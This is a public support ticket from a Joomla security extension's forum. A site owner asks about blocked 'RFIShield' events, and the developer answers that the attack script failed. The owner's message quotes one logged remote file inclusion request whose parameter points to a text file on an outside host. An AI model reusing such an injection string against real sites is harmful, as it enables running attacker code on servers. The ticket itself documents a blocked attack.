Admin Tools

#13056 RFI attacks

Posted in ‘Admin Tools for Joomla! 4 & 5’

This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version

n/a

PHP version

n/a

Admin Tools version

n/a

Latest post by nicholas on Friday, 27 July 2012 04:07 CDT

Friday, 27 July 2012 03:32 CDT

klox7

Hello,

for a day now I'm getting Admin tools reports for my site with "Reason: RFIShield". When I go to Security exeption log" in admin, under Target URL there is this:
mydomain/index.php?t=http://www.arcidiocesidisassari.it/WHAT/e.txt?&servidor=mydomain/index.php?t=&[email protected]. The IP address is also different from attack to attack.
What does this mean? How can I check if anything was compromised?
Regards

Friday, 27 July 2012 03:47 CDT

nicholas

You are not compromised because Admin Tools blocked the rather unskilled attack. Don't worry, this is just a script kiddie who's running an attack script against your site. The attack script wouldn't work anyway and Admin Tools blocks it nonetheless.

Nicholas K. Dionysopoulos

Lead Developer and Director

🇬🇷Greek: native 🇬🇧English: excellent 🇫🇷French: basic • 🕐 My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Friday, 27 July 2012 04:05 CDT

klox7

Thanks Nicholas for quick assistance! Regards

Friday, 27 July 2012 04:07 CDT